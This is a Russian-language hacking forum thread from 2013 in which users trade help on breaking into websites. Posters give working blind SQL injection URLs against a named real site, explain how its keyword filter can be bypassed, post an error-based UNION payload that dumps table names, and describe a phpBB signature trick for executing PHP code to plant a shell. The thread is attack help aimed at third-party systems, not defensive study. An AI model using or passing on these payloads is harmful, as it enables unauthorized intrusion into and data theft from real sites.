 |
|
04.10.2013, 16:32
|
|
Новичок
Регистрация: 06.03.2013
Сообщений: 21
С нами:
6940406
Репутация:
0
|
|
Помогите раскрутить, через sqlmap не получается у меня.
info(.)dra(c)onic(.)ru/?part=npcs&id=95%27%22\%27\%22\ - без ( )
|
|
|
05.10.2013, 11:39
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 0
С нами:
10992741
Репутация:
0
|
|
Сообщение от psihoz26
Код:
$result = mysql_query("SELECT * FROM profiles where login = '$username' and sa = '$otvet_na_vopros' and sq = '$u2'") or die("niiiii");
тут только в слепую крутить получается через benchmark
в других же случаях выдает niiiii =\
подскажите как ещё попробовать?? Зависит от того, что потом происходит с данными из $result.
Сообщение от Massay
Помогите раскрутить, через sqlmap не получается у меня.
info(.)dra(c)onic(.)ru/?part=npcs&id=95%27%22\%27\%22\ - без ( )
Запятые вырезаются
http://info.draconic.ru/?part=npcs&id=95 and mid(version()from 1 for 1)=5
|
|
|
|
05.10.2013, 15:40
|
|
Новичок
Регистрация: 06.03.2013
Сообщений: 21
С нами:
6940406
Репутация:
0
|
|
Перешел по ссылке ничего не произошло. Скажите пожалуйста можно розкрутить sql injection по моей ссылке. Если да, буду вам очень признателен за помощь.
|
|
|
|
05.10.2013, 15:42
|
|
Постоянный
Регистрация: 17.09.2011
Сообщений: 390
С нами:
7712246
Репутация:
23
|
|
Сообщение от Massay
Перешел по ссылке ничего не произошло. Скажите пожалуйста можно розкрутить sql injection по моей ссылке. Если да, буду вам очень признателен за помощь.
думаю , что нет
|
|
|
|
05.10.2013, 16:24
|
|
Познающий
Регистрация: 29.08.2009
Сообщений: 75
С нами:
8789993
Репутация:
5
|
|
Сообщение от Massay
Перешел по ссылке ничего не произошло. Скажите пожалуйста можно розкрутить sql injection по моей ссылке. Если да, буду вам очень признателен за помощь.
101% ничего не выйдет
|
|
|
|
05.10.2013, 16:34
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 0
С нами:
10992741
Репутация:
0
|
|
Сообщение от Massay
Перешел по ссылке ничего не произошло. Скажите пожалуйста можно розкрутить sql injection по моей ссылке. Если да, буду вам очень признателен за помощь.
Раскрутить можно как классическую слепую
Код:
function AntiInject($str, $max_len = 500)
{
$words = array("\\", "'", ",", ";", "--", "%20", "%27", "$", "*", "WHERE", "DELETE", "DROP", "SELECT", "UPDATE", "INSERT", "EXEC", "TRUNCATE", "SHUTDOWN", "");
/* replacing , ----->>*/ $str = trim(str_replace($words, "", $str));
if (strlen($str)>$max_len) $str = "";
return $str;
}
Доставило, что при проверке содержимое не приводится к общему регистру.
+
http://info.draconic.ru/?part=npcs&id=95 and mid((select version())from 1 for 1)=5
-
http://info.draconic.ru/?part=npcs&id=95 and mid((select version())from 1 for 1)=4
|
|
|
|
05.10.2013, 20:48
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
С нами:
10095779
Репутация:
137
|
|
Сообщение от qaz
хотел короче залить шелл в phpbb3, пытаюсь разрешить в шаблонах выполнение php а в ответ ,,Найди другой форум, и ломай его, а от этого отъябись.,, )) мб есть другие способы? гугл не помог
попробуй через востонавление БД, создаешь файлик, в нем прописываешь:
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]UPDATE nuke_bbusers SET user_sig_bbcode_uid[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'(.+)/e\0'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]user_sig[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'phpbb:phpinfo()'[/COLOR][COLOR="#0000BB"]WHERE user_id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"];[/COLOR][/COLOR]
потом идешь в профиль аккаунта и смотришь выполнится ли пхпинфо user_id=2 это акк к которому есть доступ, по умолчанию админский прописан...
|
|
|
|
05.10.2013, 21:21
|
|
Познавший АНТИЧАТ
Регистрация: 12.07.2010
Сообщений: 1,546
С нами:
8334326
Репутация:
75
|
|
Сообщение от winstrool
попробуй через востонавление БД, создаешь файлик, в нем прописываешь:
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]UPDATE nuke_bbusers SET user_sig_bbcode_uid[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'(.+)/e\0'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]user_sig[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'phpbb:phpinfo()'[/COLOR][COLOR="#0000BB"]WHERE user_id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"];[/COLOR][/COLOR]
потом идешь в профиль аккаунта и смотришь выполнится ли пхпинфо
user_id=2
это акк к которому есть доступ, по умолчанию админский прописан... перерыл всю админку, нема в третей версии возможности загрузить файл для востановления БД
|
|
|
|
05.10.2013, 23:40
|
|
Новичок
Регистрация: 21.04.2013
Сообщений: 22
С нами:
6874166
Репутация:
0
|
|
Сообщение от Inoms
Юнион там без полезен, он ничего не отображает, работает только по ошибкам всё.
ЗЫ: union select+1,2,3,4,count(*),concat((select+table_name from information_schema.tables where table_schema=database() limit 0,1),0x3a,floor(rand(0)*2)) x from information_schema.tables group by x -- t
Растолкуйте пожалуйста запрос:
concat((select+table_name from information_schema.tables where table_schema=database() limit 0,1),0x3a,floor(rand(0)*2))
что он делает? по идее вроде после 0x3a ожидается ввод параметра или нет?
и для чего здесь count(*)?
|
|
|
|
06.10.2013, 00:10
|
|
Познавший АНТИЧАТ
Регистрация: 12.07.2010
Сообщений: 1,546
С нами:
8334326
Репутация:
75
|
|
Сообщение от kilo_star
Растолкуйте пожалуйста запрос:
concat((select+table_name from information_schema.tables where table_schema=database() limit 0,1),0x3a,floor(rand(0)*2))
что он делает? по идее вроде после 0x3a ожидается ввод параметра или нет?
и для чего здесь count(*)?
запрос выбирает таблицы из текущей базы
|
|
|
|
|
|
|
Предыдущая тема
Следующая тема
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
